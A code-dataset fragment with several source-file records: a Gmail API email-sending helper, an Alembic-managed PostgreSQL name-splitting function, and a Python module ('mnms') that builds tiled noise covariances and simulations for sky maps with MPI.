if cid is not None:
attachment.add_header('Content-ID', '<{}>'.format(cid))
return attachment
def prepare(self) -> dict:
"""
Get the message in a form that the Gmail API understand
"""
has_attachments = len(self.extra_attachments) != 0 or len(self.html_attachments) != 0
# create the message
msg = MIMEMultipart('mixed' if has_attachments else 'alternative')
msg['To'] = self.recipient
msg['From'] = self.sender
msg['Subject'] = self.subject
if len(self.cc) > 0:
msg['Cc'] = ', '.join(self.cc)
if len(self.bcc) > 0:
msg['Bcc'] = ', '.join(self.bcc)
# attach the text(s) to the message correctly
attachments = []
attach_plain = MIMEText(self.msg_plain, 'plain')
attach_html = MIMEText(self.msg_html, 'html')
if not has_attachments:
if self.msg_plain:
attachments.append(attach_plain)
if self.msg_html:
attachments.append(attach_html)
else:
attachment_alt = MIMEMultipart('alternative')
attach_related = MIMEMultipart('related')
if self.msg_plain:
attachment_alt.attach(attach_plain)
if self.msg_html:
attach_related.attach(attach_html)
# add the HTML attachments to the related part
for attachment in self.html_attachments:
attach_related.attach(attachment)
attachment_alt.attach(attach_related)
attachments.append(attachment_alt)
# add other attachments
attachments.extend(self.extra_attachments)
# attach
for attachment in attachments:
msg.attach(attachment)
# get dict
return {
'raw': base64.urlsafe_b64encode(msg.as_string().encode()).decode()
}
class Gmail:
"""
The Gmail object, used as entry point for the Gmail API.
"""
# Allow Gmail to read and write emails, and access settings like aliases.
_SCOPES = [
'https://www.googleapis.com/auth/gmail.modify',
'https://www.googleapis.com/auth/gmail.settings.basic'
]
def __init__(
self,
client_secret_file: str = 'client_secret.json',
creds_file: str = 'gmail_token.json',
_creds: Optional[client.Credentials] = None
) -> None:
self.client_secret_file = client_secret_file
self.creds_file = creds_file
try:
if _creds:
self.creds = _creds
else:
store = file.Storage(self.creds_file)
self.creds = store.get()
if not self.creds or self.creds.invalid:
# Will ask you to authenticate an account in your browser.
flow = client.flow_from_clientsecrets(self.client_secret_file, self._SCOPES)
self.creds = tools.run_flow(flow, store)
self.service = build('gmail', 'v1', http=self.creds.authorize(Http()), cache_discovery=False)
except InvalidClientSecretsError:
raise FileNotFoundError(
"Your 'client_secret.json' file is nonexistent. Make sure "
'the file is in the root directory of your application. If '
"you don't have a client secrets file, go to https://"
'developers.google.com/gmail/api/quickstart/python, and '
'follow the instructions listed there.'
)
def send(self, message: Message, user_id: str = 'me') -> None:
"""Send a message
"""
msg = message.prepare()
try:
req = self.service.users().messages().send(userId=user_id, body=msg)
req.execute()
except HttpError as error:
# Pass along the error
raise error | en | 0.793021 | Utils functions to send an email via Gmail, extended to accept embedded files. Most of the code is due to https://github.com/jeremyephron/simplegmail/blob/66e776d5211042b2868664ca800bdfc45323732c/simplegmail/gmail.py Class representing a message, ready to be sent Attach a file as a normal attachment Add a HTML inline attachment (to be embedded). If `cid` is `None`, the `cid` is taken as the file basename. Create an attachment from a file # backup to octet-stream if any # create attachment # add info Get the message in a form that the Gmail API understand # create the message # attach the text(s) to the message correctly # add the HTML attachments to the related part # add other attachments # attach # get dict The Gmail object, used as entry point for the Gmail API. # Allow Gmail to read and write emails, and access settings like aliases. # Will ask you to authenticate an account in your browser. Send a message # Pass along the error | 2.965809 | 3 |
ppr-api/src/database/postgres_functions/individual_split_2.py | cameron-freshworks/ppr | 0 | 6616797 | <reponame>cameron-freshworks/ppr<filename>ppr-api/src/database/postgres_functions/individual_split_2.py
"""Maintain db function searchkey_first_name here."""
from alembic_utils.pg_function import PGFunction
individual_split_2 = PGFunction(
schema="public",
signature="individual_split_2(actual_name character varying)",
definition="""
RETURNS character varying
LANGUAGE plpgsql
AS $function$
DECLARE
v_last_name VARCHAR(150);
v_split_2 VARCHAR(50);
BEGIN
-- Remove special characters last name
v_last_name := regexp_replace(ACTUAL_NAME,'[^\w]+',' ','gi');
-- Remove prefixes suffixes last name
v_last_name := regexp_replace(v_last_name,'\y(DR|MR|MRS|MS|CH|DE|DO|DA|LE|LA|MA|JR|SR|I|II|III)\y','','gi');
v_last_name := trim(regexp_replace(v_last_name, '\s+', ' ', 'gi'));
-- Split second name
v_split_2 := split_part(v_last_name,' ',2);
RETURN UPPER(v_split_2);
END
;
$function$;
"""
)
| """Maintain db function searchkey_first_name here."""
from alembic_utils.pg_function import PGFunction
individual_split_2 = PGFunction(
schema="public",
signature="individual_split_2(actual_name character varying)",
definition="""
RETURNS character varying
LANGUAGE plpgsql
AS $function$
DECLARE
v_last_name VARCHAR(150);
v_split_2 VARCHAR(50);
BEGIN
-- Remove special characters last name
v_last_name := regexp_replace(ACTUAL_NAME,'[^\w]+',' ','gi');
-- Remove prefixes suffixes last name
v_last_name := regexp_replace(v_last_name,'\y(DR|MR|MRS|MS|CH|DE|DO|DA|LE|LA|MA|JR|SR|I|II|III)\y','','gi');
v_last_name := trim(regexp_replace(v_last_name, '\s+', ' ', 'gi'));
-- Split second name
v_split_2 := split_part(v_last_name,' ',2);
RETURN UPPER(v_split_2);
END
;
$function$;
"""
) | en | 0.290519 | Maintain db function searchkey_first_name here. RETURNS character varying LANGUAGE plpgsql AS $function$ DECLARE v_last_name VARCHAR(150); v_split_2 VARCHAR(50); BEGIN -- Remove special characters last name v_last_name := regexp_replace(ACTUAL_NAME,'[^\w]+',' ','gi'); -- Remove prefixes suffixes last name v_last_name := regexp_replace(v_last_name,'\y(DR|MR|MRS|MS|CH|DE|DO|DA|LE|LA|MA|JR|SR|I|II|III)\y','','gi'); v_last_name := trim(regexp_replace(v_last_name, '\s+', ' ', 'gi')); -- Split second name v_split_2 := split_part(v_last_name,' ',2); RETURN UPPER(v_split_2); END ; $function$; | 2.510697 | 3 |
mnms/tiled_noise_mpi.py | ACTCollaboration/mnms | 4 | 6616798 | <reponame>ACTCollaboration/mnms
from orphics import maps
from pixell import enmap, curvedsky, wcsutils
import healpy as hp
from mnms import covtools, utils, mpi
from mnms.tiled_ndmap import tiled_ndmap
import astropy.io.fits as pyfits
import numpy as np
from math import ceil
import matplotlib.pyplot as plt
import time
seedgen = utils.seed_tracker
# harcoded constants
LARGE_SCALE_TILE_NUM = 103_094
def get_iso_curvedsky_noise_covar(imap, ivar=None, mask=None, N=5, lmax=1000):
"""Get the 1D global, isotropic power spectra to draw sims from later. Ivar maps, if passed
are used to pre-whiten the maps in pixel-space by their high-ell white noise level prior to
measuring power spectra.
Parameters
----------
imap : enmap.ndmap
Map with shape ([num_arrays, num_splits, num_pol,] ny, nx)
ivar : enmap.ndmap, optional
Inverse-variance maps for imap with shape([num_arrays, num_splits, 1,], ny, nx), by default None
mask : enmap.ndmap, optional
A map-space window to apply to imap before calculting power spectra, by default None
N : int, optional
Perform a rolling average over the spectra with this width in ell, by default 5
lmax : int, optional
Bandlimit of measured spectra, by default 1000
Returns
-------
enmap.ndmap
A set of power spectra from the crosses of array, pol pairs. Only saves upper-triangular matrix
elements, so e.g. if 2 arrays and 3 pols, output shape is (21, lmax+1)
"""
# if ivar is not None, whiten the imap data using ivar
if ivar is not None:
assert np.all(ivar >= 0)
imap = utils.get_whitened_noise_map(imap, ivar)
# make data 5d, with prepended shape (num_arrays, num_splits, num_pol)
assert imap.ndim in range(2, 6), 'Data must be broadcastable to shape (num_arrays, num_splits, num_pol, ny, nx)'
imap = utils.atleast_nd(imap, 5) # make data 5d
num_arrays, num_splits, num_pol = imap.shape[:3]
ncomp = num_arrays * num_pol
nspec = utils.triangular(ncomp)
# get the mask, pixsizemap, and initialized output
if mask is None:
mask = enmap.ones(imap.shape[-2:], wcs=imap.wcs)
pmap = enmap.pixsizemap(mask.shape, mask.wcs)
Nl_1d = np.zeros([nspec, lmax+1], dtype=imap.dtype) # upper triangular
ls = np.arange(lmax+1)
# get alms of each array, split, pol
print('Measuring alms of each map')
alms = []#np.zeros(imap.shape[:3] + ls.shape, dtype=imap.dtype)
for map_index in range(num_arrays):
for split in range(num_splits):
for pol_index in range(num_pol):
alms.append(curvedsky.map2alm(imap[map_index, split, pol_index]*mask, lmax=lmax))
alms = np.array(alms)
alms = alms.reshape(*imap.shape[:3], -1)
# iterate over spectra
for i in range(nspec):
# get array, pol indices
comp1, comp2 = utils.triu_pos(i, ncomp)
map_index_1, pol_index_1 = divmod(comp1, num_pol)
map_index_2, pol_index_2 = divmod(comp2, num_pol)
print(f'Measuring cross between (array{map_index_1}, pol{pol_index_1}) and (array{map_index_2}, pol{pol_index_2})')
# get cross power
power = 0
for split in range(num_splits):
alm_a = alms[map_index_1, split, pol_index_1]
alm_b = alms[map_index_2, split, pol_index_2]
power += curvedsky.alm2cl(alm_a, alm_b)
power /= num_splits
# smooth
power[~np.isfinite(power)] = 0
if N > 0:
power = utils.rolling_average(power, N)
bins = np.arange(len(power))
power = maps.interp(bins, power)(ls)
power[:2] = 0
# assign
Nl_1d[i] = power
# normalize by area and return final object
w2 = np.sum((mask**2)*pmap) / np.pi / 4.
return enmap.ndmap(Nl_1d, wcs=imap.wcs) / w2
def get_iso_curvedsky_noise_sim(covar, ivar=None, flat_triu_axis=0, oshape=None, num_arrays=None, lfunc=None, split=None, seed=None, seedgen_args=None):
"""Get a noise realization from the 1D global, isotropic power spectra generated in get_iso_curvedsky_noise_covar.
If power spectra were prewhitened with ivar maps, same ivar maps must be passed to properly weight sims in
pixel space.
Parameters
----------
covar : enmap.ndmap
1D global, isotropic power spectra to draw sim from. Shape must be (nspec, lmax+1), where
nspec is a triangular number
ivar : enmap.ndmap, optional
Inverse-variance map to weight output sim by in pixel-space with
shape([num_arrays, num_splits, 1,], ny, nx), by default None
flat_triu_axis : int, optional
Axis of covar that carries the flattened upper-triangle of the covariance matrix, by default 0
oshape : at-least-length-2 iterable, optional
If ivar is not passed, the shape of the sim, by default None
num_arrays : int, optional
If ivar is not passed the number of arrays that generated covar, by default None
lfunc : function, optional
A transfer function to modulate sim power in harmonic space, by default None
split : int, optional
The index of ivar corresponding to the desired split, by default None
seed : Random seed for spectra, optional
If seedgen_args is None then the maps will have this seed, by default None
seedgen_args : length-4 tuple, optional
A tuple containing (split, map_id, data_model, list-of-qids) to pass to
seedgen.get_tiled_noise_seed(...), by default None
Returns
-------
enmap.ndmap
A shape([num_arrays, 1, num_pol,] ny, nx) 1D global, isotropic noise simulation of given split in given array
"""
# get ivar, and num_arrays if necessary
if ivar is not None:
assert np.all(ivar >= 0)
# make data 5d, with prepended shape (num_arrays, num_splits, num_pol)
assert ivar.ndim in range(2, 6), 'Data must be broadcastable to shape (num_arrays, num_splits, num_pol, ny, nx)'
ivar = utils.atleast_nd(ivar, 5) # make data 5d
if num_arrays is not None:
assert num_arrays == ivar.shape[0], 'Introspection of ivar shape gives different num_arrays than num_arrays arg'
num_arrays = ivar.shape[0]
oshape = ivar.shape[-2:]
else:
assert num_arrays is not None, 'If ivar not passed, must pass num_arrays as arg'
assert oshape is not None, 'If ivar not passed, must pass oshape as arg'
oshape = oshape[-2:]
# get component shapes and reshape covar
# assumes covar flat_triu_axis is axis 0
ncomp = utils.triangular_idx(covar.shape[flat_triu_axis])
num_pol = ncomp // num_arrays
# get the 1D PS from covar
wcs = covar.wcs
covar = utils.from_flat_triu(covar, axis1=0, axis2=1, flat_triu_axis=flat_triu_axis)
covar = enmap.ndmap(covar, wcs=wcs)
print(f'Shape: {covar.shape}')
# apply a filter if passed
if lfunc is not None:
covar *= lfunc(np.arange(covar.shape[-1]))
# determine the seed. use a seedgen if seedgen_args is not None
if seedgen_args is not None:
# if the split is the seedgen setnum, prepend it to the seedgen args
if len(seedgen_args) == 3: # sim_idx, data_model, qid
seedgen_args = (split,) + seedgen_args
else:
assert len(seedgen_args) == 4 # set_idx, sim_idx, data_model, qid:
seedgen_args = seedgen_args + (LARGE_SCALE_TILE_NUM,) # dummy "tile_idx" for full sky random draw is 103,094
seed = seedgen.get_tiled_noise_seed(*seedgen_args)
print(f'Seed: {seed}')
# generate the noise and sht to real space
oshape = (ncomp,) + oshape
omap = curvedsky.rand_map(oshape, covar.wcs, covar, lmax=covar.shape[-1], dtype=covar.dtype, seed=seed)
omap = omap.reshape((num_arrays, 1, num_pol) + oshape[-2:])
# if ivar is not None, unwhiten the imap data using ivar
if ivar is not None:
splitslice = utils.get_take_indexing_obj(ivar, split, axis=-4)
ivar = ivar[splitslice]
ivar = np.broadcast_to(ivar, omap.shape)
omap[ivar != 0 ] /= np.sqrt(ivar[ivar != 0])
return omap
def get_tiled_noise_covsqrt_mpi(imap, ivar=None, mask=None, width_deg=4., height_deg=4., delta_ell_smooth=400, ledges=None,
tiled_mpi_manager=None, verbose=True):
'''Generate the 2d noise spectra for each of the tiles
'''
# get mpi manager
if tiled_mpi_manager is None:
tiled_mpi_manager = mpi.TiledMPIManager(mpi=False)
# serial code
if tiled_mpi_manager.is_root:
# if ivar is not None, whiten the imap data using ivar
if ivar is not None:
assert np.all(ivar >= 0)
imap = utils.get_whitened_noise_map(imap, ivar)
# make data 5d, with prepended shape (num_arrays, num_splits, num_pol)
assert imap.ndim in range(2, 6), 'Data must be broadcastable to shape (num_arrays, num_splits, num_pol, ny, nx)'
imap = utils.atleast_nd(imap, 5) # make data 5d
# filter map prior to tiling, get the c_ells
# imap is masked here, as part of the filtering
if mask is None:
mask = enmap.ones(imap.shape[-2:], wcs=imap.wcs)
if ledges is None:
ledges = np.arange(0, 10_000, maps.minimum_ell(imap.shape, imap.wcs)+1)
mask = mask.astype(imap.dtype)
imap, cov_1D = utils.ell_flatten(imap, mask=mask, ledges=ledges, return_cov=True)
# get the tiled data, tiled mask
imap = tiled_ndmap(imap, width_deg=width_deg, height_deg=height_deg)
sq_f_sky = imap.set_unmasked_tiles(mask, return_sq_f_sky=True)
imap = imap.to_tiled()
# # explicitly passing tiled=False and self.ishape will check that mask.shape and imap.ishape are compatible
# mask = imap.sametiles(mask, tiled=False).to_tiled()
else:
imap = None
# mask = None
sq_f_sky = None
# parallel code
imap = tiled_mpi_manager.Scatterv_tiled_ndmap(imap)
# mask = tiled_mpi_manager.Scatterv_tiled_ndmap(mask)
apod = imap.apod()
sq_f_sky = tiled_mpi_manager.Scatterv(sq_f_sky)
# # serial code
# if tiled_mpi_manager.is_root:
# my, mx = mcm.get_vecs_from_outer_mask(apod)
# invmcm = mcm.get_inv_mcm(my, arr2=mx, verbose=verbose)
# else:
# invmcm = None
# # parallel code
# invmcm = tiled_mpi_manager.Bcast(invmcm)
# get component shapes
num_arrays, num_splits, num_pol = imap.shape[1:4] # shape is (num_tiles, num_arrays, num_splits, num_pol, ...)
ncomp = num_arrays * num_pol
nspec = utils.triangular(ncomp)
# make the output PS map. imap.shape[-2:] is the tile shape
omap = np.zeros((imap.num_tiles, nspec) + imap.shape[-2:], dtype=imap.dtype)
# quick serial code
if tiled_mpi_manager.is_root and verbose:
print(f'Number of Arrays: {num_arrays}, Number of Splits: {num_splits}, Number of Pols.: {num_pol}')
# parallel code
# cycle through the tiles
for i, n in enumerate(imap.unmasked_tiles):
if verbose:
print('Doing tile {} of {}'.format(n, imap.numx*imap.numy-1))
# get 2d tile geometry and modlmap, if the declination has changed
# modlmap calls extent(..., signed=True), so this is the fastest way to check for a change
_, ewcs = imap.get_tile_geometry(n)
# if i == 0:
# modlmap = enmap.modlmap(eshape, ewcs).astype(imap.dtype)
# else:
# if not np.all(enmap.extent(eshape, ewcs, signed=True) == enmap.extent(eshape, prev_ewcs, signed=True)):
# modlmap = enmap.modlmap(eshape, ewcs).astype(imap.dtype)
# prev_ewcs = ewcs
# get the 2d tile PS, shape is (num_arrays, num_splits, num_pol, ny, nx)
# so trace over component -4
# this normalization is different than DR4 but avoids the need to save num_splits metadata, and we
# only ever simulate splits anyway...
smap = enmap.fft(enmap.ndmap(imap[i]*apod, wcs=ewcs), normalize='phys')
smap = np.einsum('...miayx,...nibyx->...manbyx', smap, np.conj(smap)).real / num_splits
# # decouple mcm
# if verbose:
# print('Decoupling modes')
# smap = np.einsum('...YXyx,...yx->...YX', invmcm, smap)
if verbose:
print(f'Shape: {smap.shape}')
# iterate over spectra
for j in range(nspec):
# get array, pol indices
comp1, comp2 = utils.triu_pos(j, ncomp)
map_index_1, pol_index_1 = divmod(comp1, num_pol)
map_index_2, pol_index_2 = divmod(comp2, num_pol)
# whether we are on the main diagonal
diag = comp1 == comp2
# get this 2D PS and apply correct geometry for this tile
power = smap[map_index_1, pol_index_1, map_index_2, pol_index_2]
power = enmap.ndmap(power, wcs=ewcs)
# # smooth the power spectrum. only use radial fit and log for autos
# # cross including intensity have atmospheric noise to higher ell
# if pol_index_1 == 0 or pol_index_2 == 0:
# lmin = 300
# lknee_guess = 3000
# else:
# lmin = 30
# lknee_guess = 500
# smooth the 2D PS
if delta_ell_smooth > 0:
power = covtools.smooth_ps_grid_uniform(power, delta_ell_smooth, diag=diag)
# skip smoothing if delta_ell_smooth=0 is passed as arg
elif delta_ell_smooth == 0:
if verbose:
print('Not smoothing')
else:
raise ValueError('delta_ell_smooth must be >= 0')
# update output 2D PS map
smap[map_index_1, pol_index_1, map_index_2, pol_index_2] = power
if not diag: # symmetry
smap[map_index_2, pol_index_2, map_index_1, pol_index_1] = power
# correct for f_sky from mask and apod windows
smap /= sq_f_sky[i]
# take covsqrt of current power, need to reshape so prepended dimensions are 2x2
smap = enmap.multi_pow(smap.reshape((ncomp, ncomp) + smap.shape[-2:]), 0.5, axes=(-4,-3))
# get upper triu of the covsqrt for efficient disk-usage
omap[i] = utils.to_flat_triu(smap, axis1=0, axis2=1, flat_triu_axis=0)
omap = imap.sametiles(omap)
omap = tiled_mpi_manager.Gatherv_tiled_ndmap(omap)
# serial code
if tiled_mpi_manager.is_root:
return omap, ledges, cov_1D
else:
return None, None
def get_tiled_noise_sim_mpi(covsqrt, ivar=None, flat_triu_axis=1, num_arrays=None, tile_lfunc=None, ledges=None, cov_1D=None,
split=None, seed=None, seedgen_args=None, lowell_seed=False, tiled_mpi_manager=None, verbose=True):
'''Generate a sim from the 2d noise spectra for each of the tiles
'''
# get mpi manager
if tiled_mpi_manager is None:
tiled_mpi_manager = mpi.TiledMPIManager(mpi=False)
# serial code
if tiled_mpi_manager.is_root:
t0 = time.time()
# get ivar, and num_arrays if necessary
if ivar is not None:
assert np.all(ivar >= 0)
# make data 5d, with prepended shape (num_arrays, num_splits, num_pol)
assert ivar.ndim in range(2, 6), 'Data must be broadcastable to shape (num_arrays, num_splits, num_pol, ny, nx)'
ivar = utils.atleast_nd(ivar, 5) # make data 5d
if num_arrays is not None:
assert num_arrays == ivar.shape[0], 'Introspection of ivar shape gives different num_arrays than num_arrays arg'
num_arrays = ivar.shape[0]
else:
assert num_arrays is not None, 'If ivar not passed, must pass num_arrays as arg'
if cov_1D is not None:
assert ledges is not None, 'Must pass ledges if passing cov_1D to filter'
assert len(ledges) == cov_1D.shape[-1] + 1, 'Must be n_ell+1 ledges'
assert covsqrt.tiled, 'Covsqrt must be tiled'
t1 = time.time(); print(f'Init time: {np.round(t1-t0, 3)}')
else:
covsqrt = None
num_arrays = None
# parallel code
covsqrt = tiled_mpi_manager.Scatterv_tiled_ndmap(covsqrt)
num_arrays = tiled_mpi_manager.bcast(num_arrays)
# get component shapes
ncomp = utils.triangular_idx(covsqrt.shape[flat_triu_axis])
num_pol = ncomp // num_arrays
# make the output sim map. covsqrt.shape[-2:] is the tile shape
omap = np.zeros((covsqrt.num_tiles, num_arrays, 1, num_pol) + covsqrt.shape[-2:], dtype=covsqrt.dtype)
if tiled_mpi_manager.is_root and verbose:
print(f'Number of Arrays: {num_arrays}, Number of Pols.: {num_pol}')
# cycle through the tiles
for i, n in enumerate(covsqrt.unmasked_tiles):
if verbose:
print('Doing tile {} of {}'.format(n, covsqrt.numx*covsqrt.numy-1))
# get 2d tile geometry
eshape, ewcs = covsqrt.get_tile_geometry(n)
# get the 2D PS from covsqrt
# subtract 1 from flat_triu_axis since we are doing covsqrt[i]
smap = utils.from_flat_triu(covsqrt[i], axis1=0, axis2=1, flat_triu_axis=flat_triu_axis-1)
if verbose:
print(f'Shape: {smap.shape}')
# apply a filter if passed, and if declination has changed build new filter.
# modlmap calls extent(..., signed=True), so this is the fastest way to check for a change.
# since modifying modes, not PS, use lfunc(...)**0.5; ie lfunc defines how one would modify
# the PS the modes are drawn from
if tile_lfunc is not None:
if i == 0:
f_ell = tile_lfunc(enmap.modlmap(eshape, ewcs).astype(covsqrt.dtype))**0.5
else:
if not np.all(enmap.extent(eshape, ewcs, signed=True) == enmap.extent(eshape, prev_ewcs, signed=True)):
f_ell = tile_lfunc(enmap.modlmap(eshape, ewcs).astype(covsqrt.dtype))**0.5
prev_ewcs = ewcs
smap *= f_ell
# determine the seed. use a seedgen if seedgen_args is not None
if seedgen_args is not None:
# if the split is the seedgen setnum, prepend it to the seedgen args
if len(seedgen_args) == 3: # sim_idx, data_model, qid
seedgen_args = (split,) + seedgen_args
else:
assert len(seedgen_args) == 4 # set_idx, sim_idx, data_model, qid
seedgen_args_tile = seedgen_args + (n,)
seed = seedgen.get_tiled_noise_seed(*seedgen_args_tile, lowell_seed=lowell_seed)
if verbose:
print(f'Seed: {seed}')
# generate the noise and fft to real space
if seed is not None:
np.random.seed(seed)
# determine dtype
if np.dtype(covsqrt.dtype).itemsize == 4:
rand_dtype = np.complex64
elif np.dtype(covsqrt.dtype).itemsize == 8:
rand_dtype = np.complex128
else:
raise TypeError('Only float32 and float64 implemented for now')
# simulate
randn = enmap.rand_gauss_harm((ncomp,) + smap.shape[-2:], ewcs).astype(rand_dtype) # stuck with this casting
smap = enmap.map_mul(smap, randn)
smap = enmap.ifft(smap, normalize='phys').real
smap = smap.reshape((num_arrays, 1, num_pol) + smap.shape[-2:]) # add a dimension for split
# update output map
omap[i] = smap
omap = covsqrt.sametiles(omap)
omap = tiled_mpi_manager.Gatherv_tiled_ndmap(omap)
# must untile serially
if tiled_mpi_manager.is_root:
t2 = time.time(); print(f'Tile sim time: {np.round(t2-t1, 3)}')
omap = omap.from_tiled(power=0.5, return_as_enmap=False)
t3 = time.time(); print(f'Stitch time: {np.round(t3-t2, 3)}')
# determine whether to filter
if tiled_mpi_manager.is_root:
to_filter = cov_1D is not None
else:
to_filter = None
to_filter = tiled_mpi_manager.bcast(to_filter)
# prepare omap for parallel filtering, if necessary
if to_filter:
if tiled_mpi_manager.is_root:
assert (num_arrays, num_pol) == cov_1D.shape[:-1], 'cov_1D shape does not match (num_arrays, num_pol, ...)'
assert (num_arrays, 1, num_pol) == omap.shape[:-2], 'omap shape does not match (num_arrays, 1, num_pol, ...)'
cov_1D = cov_1D.reshape(-1, *cov_1D.shape[-1:])
omap = omap.reshape(-1, *omap.shape[-2:])
ledges = tiled_mpi_manager.Bcast(ledges)
cov_1D = tiled_mpi_manager.Scatterv(cov_1D)
omap = tiled_mpi_manager.Scatterv_tiled_ndmap(omap)
else:
ledges = tiled_mpi_manager.Bcast(None)
cov_1D = tiled_mpi_manager.Scatterv(None)
omap = tiled_mpi_manager.Scatterv_tiled_ndmap(None)
# do filtering in parallel to save a little time, can only scatter maps to filter unfortunately
for i in range(len(cov_1D)):
ilfunc = utils.interp1d_bins(ledges, cov_1D[i], bounds_error=False)
olfunc = lambda l: np.sqrt(ilfunc(l))
omap[i] = utils.ell_filter(omap[i], olfunc)
omap = tiled_mpi_manager.Gatherv_tiled_ndmap(omap)
# do ivar-weighting serially
if tiled_mpi_manager.is_root:
# reshape omap back to (num_arrays, 1, num_pol, ...)
omap = omap.reshape(num_arrays, 1, num_pol, *omap.shape[-2:]).to_ndmap()
t4 = time.time(); print(f'Filter time: {np.round(t4-t3, 3)}')
# if ivar is not None, unwhiten the imap data using ivar
if ivar is not None:
splitslice = utils.get_take_indexing_obj(ivar, split, axis=-4)
ivar = ivar[splitslice]
ivar = np.broadcast_to(ivar, omap.shape)
omap[ivar != 0] /= np.sqrt(ivar[ivar != 0])
t5 = time.time(); print(f'Ivar-weight time: {np.round(t5-t4, 3)}')
return omap
else:
return None | from orphics import maps
from pixell import enmap, curvedsky, wcsutils
import healpy as hp
from mnms import covtools, utils, mpi
from mnms.tiled_ndmap import tiled_ndmap
import astropy.io.fits as pyfits
import numpy as np
from math import ceil
import matplotlib.pyplot as plt
import time
seedgen = utils.seed_tracker
# harcoded constants
LARGE_SCALE_TILE_NUM = 103_094
def get_iso_curvedsky_noise_covar(imap, ivar=None, mask=None, N=5, lmax=1000):
"""Get the 1D global, isotropic power spectra to draw sims from later. Ivar maps, if passed
are used to pre-whiten the maps in pixel-space by their high-ell white noise level prior to
measuring power spectra.
Parameters
----------
imap : enmap.ndmap
Map with shape ([num_arrays, num_splits, num_pol,] ny, nx)
ivar : enmap.ndmap, optional
Inverse-variance maps for imap with shape([num_arrays, num_splits, 1,], ny, nx), by default None
mask : enmap.ndmap, optional
A map-space window to apply to imap before calculting power spectra, by default None
N : int, optional
Perform a rolling average over the spectra with this width in ell, by default 5
lmax : int, optional
Bandlimit of measured spectra, by default 1000
Returns
-------
enmap.ndmap
A set of power spectra from the crosses of array, pol pairs. Only saves upper-triangular matrix
elements, so e.g. if 2 arrays and 3 pols, output shape is (21, lmax+1)
"""
# if ivar is not None, whiten the imap data using ivar
if ivar is not None:
assert np.all(ivar >= 0)
imap = utils.get_whitened_noise_map(imap, ivar)
# make data 5d, with prepended shape (num_arrays, num_splits, num_pol)
assert imap.ndim in range(2, 6), 'Data must be broadcastable to shape (num_arrays, num_splits, num_pol, ny, nx)'
imap = utils.atleast_nd(imap, 5) # make data 5d
num_arrays, num_splits, num_pol = imap.shape[:3]
ncomp = num_arrays * num_pol
nspec = utils.triangular(ncomp)
# get the mask, pixsizemap, and initialized output
if mask is None:
mask = enmap.ones(imap.shape[-2:], wcs=imap.wcs)
pmap = enmap.pixsizemap(mask.shape, mask.wcs)
Nl_1d = np.zeros([nspec, lmax+1], dtype=imap.dtype) # upper triangular
ls = np.arange(lmax+1)
# get alms of each array, split, pol
print('Measuring alms of each map')
alms = []#np.zeros(imap.shape[:3] + ls.shape, dtype=imap.dtype)
for map_index in range(num_arrays):
for split in range(num_splits):
for pol_index in range(num_pol):
alms.append(curvedsky.map2alm(imap[map_index, split, pol_index]*mask, lmax=lmax))
alms = np.array(alms)
alms = alms.reshape(*imap.shape[:3], -1)
# iterate over spectra
for i in range(nspec):
# get array, pol indices
comp1, comp2 = utils.triu_pos(i, ncomp)
map_index_1, pol_index_1 = divmod(comp1, num_pol)
map_index_2, pol_index_2 = divmod(comp2, num_pol)
print(f'Measuring cross between (array{map_index_1}, pol{pol_index_1}) and (array{map_index_2}, pol{pol_index_2})')
# get cross power
power = 0
for split in range(num_splits):
alm_a = alms[map_index_1, split, pol_index_1]
alm_b = alms[map_index_2, split, pol_index_2]
power += curvedsky.alm2cl(alm_a, alm_b)
power /= num_splits
# smooth
power[~np.isfinite(power)] = 0
if N > 0:
power = utils.rolling_average(power, N)
bins = np.arange(len(power))
power = maps.interp(bins, power)(ls)
power[:2] = 0
# assign
Nl_1d[i] = power
# normalize by area and return final object
w2 = np.sum((mask**2)*pmap) / np.pi / 4.
return enmap.ndmap(Nl_1d, wcs=imap.wcs) / w2
def get_iso_curvedsky_noise_sim(covar, ivar=None, flat_triu_axis=0, oshape=None, num_arrays=None, lfunc=None, split=None, seed=None, seedgen_args=None):
"""Get a noise realization from the 1D global, isotropic power spectra generated in get_iso_curvedsky_noise_covar.
If power spectra were prewhitened with ivar maps, same ivar maps must be passed to properly weight sims in
pixel space.
Parameters
----------
covar : enmap.ndmap
1D global, isotropic power spectra to draw sim from. Shape must be (nspec, lmax+1), where
nspec is a triangular number
ivar : enmap.ndmap, optional
Inverse-variance map to weight output sim by in pixel-space with
shape([num_arrays, num_splits, 1,], ny, nx), by default None
flat_triu_axis : int, optional
Axis of covar that carries the flattened upper-triangle of the covariance matrix, by default 0
oshape : at-least-length-2 iterable, optional
If ivar is not passed, the shape of the sim, by default None
num_arrays : int, optional
If ivar is not passed the number of arrays that generated covar, by default None
lfunc : function, optional
A transfer function to modulate sim power in harmonic space, by default None
split : int, optional
The index of ivar corresponding to the desired split, by default None
seed : Random seed for spectra, optional
If seedgen_args is None then the maps will have this seed, by default None
seedgen_args : length-4 tuple, optional
A tuple containing (split, map_id, data_model, list-of-qids) to pass to
seedgen.get_tiled_noise_seed(...), by default None
Returns
-------
enmap.ndmap
A shape([num_arrays, 1, num_pol,] ny, nx) 1D global, isotropic noise simulation of given split in given array
"""
# get ivar, and num_arrays if necessary
if ivar is not None:
assert np.all(ivar >= 0)
# make data 5d, with prepended shape (num_arrays, num_splits, num_pol)
assert ivar.ndim in range(2, 6), 'Data must be broadcastable to shape (num_arrays, num_splits, num_pol, ny, nx)'
ivar = utils.atleast_nd(ivar, 5) # make data 5d
if num_arrays is not None:
assert num_arrays == ivar.shape[0], 'Introspection of ivar shape gives different num_arrays than num_arrays arg'
num_arrays = ivar.shape[0]
oshape = ivar.shape[-2:]
else:
assert num_arrays is not None, 'If ivar not passed, must pass num_arrays as arg'
assert oshape is not None, 'If ivar not passed, must pass oshape as arg'
oshape = oshape[-2:]
# get component shapes and reshape covar
# assumes covar flat_triu_axis is axis 0
ncomp = utils.triangular_idx(covar.shape[flat_triu_axis])
num_pol = ncomp // num_arrays
# get the 1D PS from covar
wcs = covar.wcs
covar = utils.from_flat_triu(covar, axis1=0, axis2=1, flat_triu_axis=flat_triu_axis)
covar = enmap.ndmap(covar, wcs=wcs)
print(f'Shape: {covar.shape}')
# apply a filter if passed
if lfunc is not None:
covar *= lfunc(np.arange(covar.shape[-1]))
# determine the seed. use a seedgen if seedgen_args is not None
if seedgen_args is not None:
# if the split is the seedgen setnum, prepend it to the seedgen args
if len(seedgen_args) == 3: # sim_idx, data_model, qid
seedgen_args = (split,) + seedgen_args
else:
assert len(seedgen_args) == 4 # set_idx, sim_idx, data_model, qid:
